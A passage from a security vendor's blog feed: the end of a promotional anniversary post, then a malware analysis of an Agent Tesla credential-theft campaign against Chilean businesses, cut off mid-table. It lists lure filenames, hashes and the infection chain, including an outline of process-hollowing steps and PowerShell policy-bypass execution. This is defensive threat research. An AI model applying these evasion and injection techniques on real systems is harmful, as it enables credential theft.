<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="459" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-1024x459.webp" alt="ANY.RUN trusted by 15k organizations worldwide " class="wp-image-20983" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-1024x459.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-300x134.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-768x344.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-1536x688.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-370x166.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-270x121.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png-740x331.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-03-20-at-10.40.40-2048x917.png.webp 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN trusted by 15k organizations worldwide</em>&nbsp;</figcaption></figure></div>


<p>Today,&nbsp;74% of Fortune 100 companies rely on ANY.RUN&nbsp;to strengthen their SOC operations, alongside SOC and MSSP teams around the world.&nbsp;</p>



<p>As we celebrate our 10th anniversary, this trust means a lot. It is also why this year’s offers are a chance for more teams to get extra value from solutions already helping security operations investigate faster, reduce workload, and respond with more confidence. </p>



<h2 class="wp-block-heading">Thank You for Trusting and Growing with Us</h2>



<p>ANY.RUN’s 10th anniversary is a moment to thank the people who helped us build, improve, and grow along the way.&nbsp;</p>



<p>To our users, customers, partners, researchers, and community — thank you for growing with us, trusting us, sharing your feedback, and making ANY.RUN part of your daily security work.&nbsp;</p>



<p>And we’re just getting started.&nbsp;</p>



<p>More updates, product improvements, threat intelligence capabilities, and security operations features are coming. Our goal stays the same: to help teams investigate threats faster, reduce uncertainty, and make stronger decisions when every minute matters.&nbsp;</p>



<p>Celebrate 10 years of ANY.RUN with us and explore your anniversary offer before May 31!&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p>ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. Its tools help security teams understand threats faster, make informed decisions, and use threat intelligence across detection, investigation, and response workflows.&nbsp;</p>



<p>The company’s solutions include&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;for enterprise-grade malware and phishing analysis, as well as ANY.RUN Threat Intelligence solutions with modules such as&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>,&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a>, TI Reports, and YARA Search. Together, they give teams fresh,&nbsp;behavior-based intelligence built on live attack analysis.&nbsp;</p>



<p>ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting strong security controls and a commitment to protecting customer data. For SOCs, MSSPs, and enterprise teams, ANY.RUN helps reduce investigation uncertainty, improve triage speed, and turn threat analysis into clear, actionable evidence.&nbsp;</p>



<p><a href="https://app.any.run/plans?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktoplans" target="_blank" rel="noreferrer noopener">Claim your offer and equip your SOC to reduce delays and respond with confidence ➔&nbsp;</a></p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/anyrun-10th-anniversary-offers/">ANY.RUN Turns 10: Special Offers for Stronger Security Operations</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/anyrun-10th-anniversary-offers/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>LATAM Under Siege: Agent Tesla’s 18-Month Credential Theft Campaign Against Chilean Enterprises</title>
		<link>https://any.run/cybersecurity-blog/agent-tesla-latam-enterprise/</link>
					<comments>https://any.run/cybersecurity-blog/agent-tesla-latam-enterprise/#respond</comments>
		
		<dc:creator><![CDATA[Moises Cerqueira (0xOlympus)]]></dc:creator>
		<pubDate>Thu, 14 May 2026 11:55:31 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Agent Tesla]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[LATAM]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20852</guid>

					<description><![CDATA[<p>Editor’s note: The analysis is authored by Moises Cerqueira, malware researcher &#38; threat hunter. You can find Moises on LinkedIn and X. Credential&#160;theft&#160;malware rarely announces itself with ransomware-level noise. Instead, it&#160;operates&#160;like a silent siphon hidden inside everyday business workflows: invoices, payroll files, purchase orders, procurement requests. Agent Tesla campaigns are especially dangerous because they target the operational [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/agent-tesla-latam-enterprise/">LATAM Under Siege: Agent Tesla&#8217;s 18-Month Credential Theft Campaign Against Chilean Enterprises</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><em><strong>Editor’s note:</strong></em><em style=""><b> The analysis is authored by Moises Cerqueira, </b></em><strong><em>malware researcher &amp; threat hunter. You can find Moises on <a href="https://www.linkedin.com/in/moises-cerqueira/">LinkedIn</a> and <a href="https://x.com/0x_Olympus">X</a>.</em></strong></p>



<p>Credential&nbsp;theft&nbsp;malware rarely announces itself with ransomware-level noise. Instead, it&nbsp;operates&nbsp;like a silent siphon hidden inside everyday business workflows: invoices, payroll files, purchase orders, procurement requests. Agent Tesla campaigns are especially dangerous because they target the operational arteries of organizations, harvesting credentials that enable deeper compromise, business email compromise (BEC), financial fraud, cloud account takeover, and long-term espionage.&nbsp;</p>



<h2 class="wp-block-heading">Key Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li>Agent Tesla&nbsp;remains&nbsp;highly effective in LATAM due to cheap licensing and easy configuration combined with&nbsp;<strong>region-specific social engineering</strong>.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Multi-stage loaders using .NET Reactor 6.x and Process Hollowing&nbsp;<strong>evade most static detection tools</strong>.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Financial and procurement departments</strong>&nbsp;are high-priority targets through purchase order and payroll-themed lures.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Compromised legitimate infrastructure</strong>&nbsp;(e.g., Romanian FTP servers) complicates blocking and attribution.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Fileless execution and cleartext FTP exfiltration</strong>&nbsp;make dynamic sandbox analysis essential.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The campaign has&nbsp;maintained&nbsp;the same C2 infrastructure for at least 18 months,&nbsp;indicating&nbsp;<strong>sustained, professional operations</strong>.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Organizations can significantly improve defenses through&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>interactive sandboxing</strong></a><strong>, targeted awareness training, and outbound FTP monitoring</strong>.&nbsp;</li>
</ul>



<p>This investigation reveals an active Agent Tesla campaign specifically targeting Chilean and broader LATAM enterprises through procurement-themed phishing lures. The malware chain combines social engineering, obfuscated loaders, process hollowing, fileless execution, and FTP-based credential exfiltration to evade traditional defenses.</p>



<p><strong>For organizations, the business impact extends far beyond a single infected endpoint: stolen browser, VPN, email, and FTP credentials can become the entry point for supply chain compromise, lateral movement, and unauthorized access to sensitive corporate systems.</strong></p>



<h2 class="wp-block-heading">Threat Overview: Agent Tesla in the LATAM Context&nbsp;</h2>



<p>Latin America has become an increasingly attractive target for commodity malware operators. The combination of rapid digitalization, growing SME supply chains, and historically lower security maturity makes the region fertile ground for credential stealers. Among these,&nbsp;<a href="https://any.run/malware-trends/agenttesla/" target="_blank" rel="noreferrer noopener">Agent Tesla</a>&nbsp;consistently ranks as one of the most deployed families —&nbsp;cheap&nbsp;to license, easy to configure, and devastatingly effective against organizations with limited email security controls.&nbsp;</p>



<p>In March 2026, during routine threat hunting, we&nbsp;identified&nbsp;a malware sample delivered inside a RAR archive named&nbsp;<em>Orden de&nbsp;compra_pdf.uu</em>&nbsp;— Spanish for ‘<em>purchase order</em>’&nbsp;—&nbsp;a social engineering lure specifically crafted for the Chilean and broader LATAM business environment. What followed was a multi-day investigation that uncovered not just a single sample, but a persistent infrastructure that has been quietly exfiltrating credentials from LATAM enterprises since at least mid-2024.&nbsp;</p>



<p>Agent Tesla is a .NET-based keylogger and credential stealer, commercially sold as a ‘Remote Administration Tool’ since 2014. Despite its age, it&nbsp;remains&nbsp;highly active because operators can&nbsp;purchase&nbsp;access cheaply and configure it through a GUI without programming knowledge. Its primary capabilities include:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Credential theft</strong> — browsers (Chrome, Firefox, Edge), email clients (Outlook, Thunderbird), FTP clients;&nbsp;</li>



<li><strong>Keylogging</strong> —&nbsp;captures&nbsp;all keystrokes in real time;&nbsp;</li>



<li><strong>Screenshot capture</strong> —&nbsp;periodic&nbsp;desktop screenshots;</li>



<li><strong>Clipboard monitoring</strong>&nbsp;—&nbsp;intercepts copied passwords and crypto wallet addresses;&nbsp;</li>



<li><strong>Exfiltration channels</strong>&nbsp;—&nbsp;SMTP, FTP, HTTP, or Telegram bot API.&nbsp;</li>
</ul>



<p>In the LATAM context, Agent Tesla operators typically use spear-phishing lures themed around business documents: purchase orders, payment receipts, payroll files, and invoices. This campaign follows that pattern precisely, targeting the financial and procurement workflows of Chilean companies.&nbsp;</p>



<h2 class="wp-block-heading">Business Impact: Why Agent Tesla Is a Serious Enterprise Threat&nbsp;</h2>



<p>While Agent Tesla is often categorized as a “commodity stealer,” the operational impact on organizations can be severe. In many environments, credential theft creates&nbsp;the conditions&nbsp;for larger and more expensive incidents.&nbsp;</p>



<p><strong>Financial Fraud and Business Email Compromise</strong>&nbsp;</p>



<p>The campaign specifically impersonates procurement and finance-related documents,&nbsp;indicating&nbsp;deliberate targeting of employees who routinely handle invoices, payment approvals, supplier communications, and payroll operations. Once email credentials are stolen, attackers can hijack ongoing financial conversations, redirect payments, or conduct BEC attacks that appear fully legitimate.&nbsp;&nbsp;</p>



<p><strong>Supply Chain Exposure</strong>&nbsp;</p>



<p>Compromised FTP, VPN, and email accounts may provide indirect access to suppliers,&nbsp;logistics&nbsp;providers, distributors, and partner organizations. This creates a multiplier effect where a single infection can propagate trust-based compromise across the wider business ecosystem.&nbsp;</p>



<p><strong>Cloud and SaaS Account Takeover</strong>&nbsp;</p>



<p>Modern browsers store credentials for cloud platforms, CRMs, collaboration tools, and internal portals. Theft of browser credential databases can therefore expose Microsoft 365, Google Workspace, Salesforce, SAP, and other critical business systems without the attacker needing to deploy ransomware or exploit vulnerabilities.&nbsp;</p>



<p><strong>Long-Term Persistence and Espionage</strong>&nbsp;</p>



<p>Agent Tesla’s keylogging, clipboard interception, and screenshot functionality enable prolonged surveillance of employee activity. This allows operators to collect sensitive information gradually over time, including contracts, credentials, API keys, internal communications, and financial data.&nbsp;</p>



<p><strong>Risk Summary:</strong>&nbsp;A single employee opening a convincing purchase order email can result in complete credential compromise across your organization&#8217;s digital tools. This campaign has&nbsp;operated&nbsp;undetected against LATAM businesses for over 18 months. The financial and operational cost of remediation significantly exceeds the cost of proactive prevention.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Close detection gaps </span>with ANY.RUN.<br>
Reduce security risk and breach impact.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=agent-tesla-latam-enterprise&#038;utm_term=140526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>This article walks through the full investigation&nbsp;methodology, from&nbsp;initial&nbsp;triage to infrastructure correlation, and&nbsp;demonstrates&nbsp;how ANY.RUN’s interactive sandbox and threat intelligence capabilities accelerated key phases of the analysis.&nbsp;&nbsp;</p>



<p><a href="https://app.any.run/tasks/d4517cfe-1a82-4679-ae72-1bb777060a13/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">The full detonation session&nbsp;is publicly&nbsp;available in the sandbox</a>.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">Campaign Technical Analysis</h2>



<h3 class="wp-block-heading">1. Initial Triage: The Malicious RAR Archive&nbsp;</h3>



<h4 class="wp-block-heading">Sample Identification&nbsp;</h4>



<p>The investigation began with a RAR v5 archive&nbsp;submitted&nbsp;for analysis. Key static properties:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-318"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="318"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:59.085963003264%;                    padding:10px;
                    "
                    >
                                        Attribute                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:10.881392818281%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:30.032644178455%;                    padding:10px;
                    "
                    >
                                        Note                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Orden de compra_pdf.uu                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        File name                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Social engineering lure -  purchase order                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        RAR archive v5                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        File type                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Container for payload delivery                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        A7EEEAD9C868D9944ED1C1F113328F32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        MD5                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                                             </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        B50B3800B17AD7AD5C4483C0B6B24D1D151A9D10                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        SHA1                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                                             </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        948C8C69FE02EDA9231AEBFA5C626335307058AC74A5C3C40B346179A1BFC982                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        SHA256                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                                             </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        March 27, 2026                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Analysis date                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        ANY.RUN sandbox detonation                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        app.any.run/tasks/54d00d6d-e6d0-4f54-8907-a571a293127b                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Full analysis                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Interactive sandbox report                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-318'>
table#wpdtSimpleTable-318{ table-layout: fixed !important; }
table#wpdtSimpleTable-318 td, table.wpdtSimpleTable318 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The file extension .uu&nbsp;is a deliberate obfuscation tactic. While the file is&nbsp;actually a&nbsp;RAR archive, the unusual extension is intended to confuse automated scanners and reduce detection rates on email gateways that rely on extension-based filtering.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="533" height="108" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1.png" alt="" class="wp-image-20873" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1.png 533w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1-300x61.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1-370x75.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1-270x55.png 270w" sizes="(max-width: 533px) 100vw, 533px" /><figcaption class="wp-element-caption">.<em>zip archive with fake extension</em></figcaption></figure></div>


<h4 class="wp-block-heading">The Social Engineering Angle&nbsp;</h4>



<p>The filename&nbsp;<em>Orden de&nbsp;compra_pdf.uu</em>&nbsp;translates to ‘<em>Purchase order PDF</em>’ in Spanish. This is a high-value lure for B2B environments: purchase orders are expected,&nbsp;frequently&nbsp;shared by email, and often opened without scrutiny by accounts payable and procurement personnel. The ‘_pdf’ substring creates a false sense of legitimacy, suggesting the recipient will open a PDF document.&nbsp;</p>



<p>This social engineering pattern is consistent across the 80+ samples we&nbsp;identified&nbsp;communicating with the campaign’s infrastructure&nbsp;&#8211;&nbsp; all&nbsp;impersonating financial or procurement documents in Spanish:&nbsp;</p>



<ul class="wp-block-list">
<li><em>Nómina&nbsp;de sueldos.pdf_008.exe&nbsp;—&nbsp;</em>payroll;&nbsp;</li>



<li>Comprobante&nbsp;de pago.pdf.exe&nbsp;—&nbsp;payment receipt;&nbsp;</li>



<li><em>Nomina_Sept2025_Confidencial.xlam</em>&nbsp;—&nbsp;confidential payroll;&nbsp;</li>



<li><em>Orden de Compra.xlam</em>&nbsp;—&nbsp;purchase order (macro-enabled spreadsheet);&nbsp;</li>



<li><em>OC 20240814.xlam / OC 20240813.xlam</em>&nbsp;—&nbsp;dated order confirmations.&nbsp;</li>
</ul>



<h3 class="wp-block-heading">2. Kill Chain Analysis&nbsp;</h3>



<h4 class="wp-block-heading">Stage 1 — JScript Encoded Dropper&nbsp;</h4>



<p>WinRAR extracts the archive to reveal Orden de compra_pdf.jse —&nbsp;a&nbsp;JScript Encoded Script (Microsoft Script Encoder format). This encoding is not&nbsp;true&nbsp;encryption, but&nbsp;is highly effective at bypassing signature-based AV detection and preventing casual inspection. The file is executed via Windows Script Host (wscript.exe).&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn suspicious attachments into <span class="highlight">actionable intelligence.</span><br>
Investigate phishing safely with <span class="highlight">ANY.RUN Sandbox.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=agent-tesla-latam-enterprise&#038;utm_term=140526&#038;utm_content=linktoregistration#register" rel="noopener" target="_blank">
Register now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>The .jse&nbsp;dropper performs several actions in sequence:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Downloads a decoy PDF</strong>&nbsp;from a remote server and opens it to distract the victim while infection&nbsp;proceeds&nbsp;silently in the background.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Drops multiple PowerShell stager scripts</strong>&nbsp;to C:\Temp\ with randomized names (AYRMWWFH.ps1, Z2KBLYG5.ps1, ELHYLTLT.ps1).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Invokes PowerShell with execution policy bypass</strong>&nbsp;—&nbsp; -ExecutionPolicy&nbsp;Bypass-&nbsp; to&nbsp;run the stagers without triggering security warnings.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Modifies registry keys</strong>&nbsp;for persistence.&nbsp;</li>
</ul>



<p>All PowerShell stager scripts dropped during the campaign share the same SHA256 hash (96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7), confirming use of a standardized stager template across the campaign.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="520" height="428" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1.png" alt="" class="wp-image-20876" style="width:650px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1.png 520w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1-300x247.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1-370x305.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1-270x222.png 270w" sizes="(max-width: 520px) 100vw, 520px" /><figcaption class="wp-element-caption"><em>Stage 1 processes visible in the sandbox</em></figcaption></figure></div>


<h4 class="wp-block-heading">Stage 2 — PowerShell Stager&nbsp;</h4>



<p>The PowerShell stager loads ALTERNATE.dll&nbsp;—&nbsp;the Agent Tesla loader&nbsp;—&nbsp;and&nbsp;injects it into a legitimate Microsoft binary. The choice of injection target is deliberate: aspnet_compiler.exe is a trusted .NET Framework&nbsp;component, and its network activity is rarely flagged by endpoint security tools.&nbsp;</p>



<p>The stager implements a Process Hollowing injection sequence:&nbsp;</p>



<pre class="wp-block-code"><code>1. Locate aspnet_compiler.exe on disk 

2. Spawn a suspended process instance 

3. VirtualAllocEx() → allocate memory in target process 

4. WriteProcessMemory() → write ALTERNATE.dll payload 

5. GetProcAddress() → resolve entry point dynamically 

6. Resume execution → Agent Tesla runs inside trusted process </code></pre>



<h4 class="wp-block-heading">Stage 3 —&nbsp;ALTERNATE.dll: The Protected Loader&nbsp;</h4>



<p>The DLL is named&nbsp;<em>ALTERNATE.dll&nbsp;</em>internally (with a matching&nbsp;<em>ALTERNATE.pdb</em>&nbsp;debug path left in the binary). Static analysis with Detect-It-Easy reveals a sophisticated protection stack:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-319"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="10"
           data-wpID="319"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:30.906148867314%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:16.181229773463%;                    padding:10px;
                    "
                    >
                                        Property                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:52.912621359223%;                    padding:10px;
                    "
                    >
                                        Details                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
